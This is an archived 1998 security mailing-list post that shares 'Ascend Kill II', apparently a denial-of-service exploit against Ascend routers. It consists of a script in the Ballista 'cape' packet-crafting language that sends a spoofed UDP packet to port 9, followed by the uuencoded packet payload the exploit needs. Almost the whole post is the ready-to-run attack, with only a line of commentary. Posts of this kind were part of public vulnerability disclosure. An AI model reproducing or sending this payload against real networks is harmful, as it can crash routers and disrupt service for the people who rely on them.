Ascend Kill II - Ballista "cape" version

From: Aleph One (aleph1at_private)
Date: Mon Mar 16 1998 - 17:30:28 PST

  • Next message: Aleph One: "Ascend Kill II - C version"

    [ from rootshell ]
    
    Secure Networks makes security auditing software called Ballista.  It has
    its own scripting language called cape.  Here is a version of Ascend Kill II
    written in cape.  Check out how small it is!
    
    -- cut here --
    
    iface=le0
    # Enter your default gateway
    gateway=10.0.0.1
    ip
    # Source IP of packet
    ip_src=1.2.3.4
    # Address of Ascend router
    ip_dst=10.0.0.2
    ip_version=4
    ip_proto=IPPROTO_UDP
    ip_flags=0
    ip_done
    udp
    udp_sport=9
    udp_dport=9
    udp_done
    data_file=ascend_data
    end_of_packet
    
    -- cut here --
    
    Here is the data that cape needs.  It is uuencoded.
    
    begin 644 ascend_data.uue
    M   'H@@2S/VD@0     2-%9X__________\ 3D%-14Y!345.04U%3D%-1?]0
    M05-35T]21%!!4U-73U)$4$%34V9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F
    M9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F
    M9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F
    M9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F
    99F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F
    
    end
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:45:44 PDT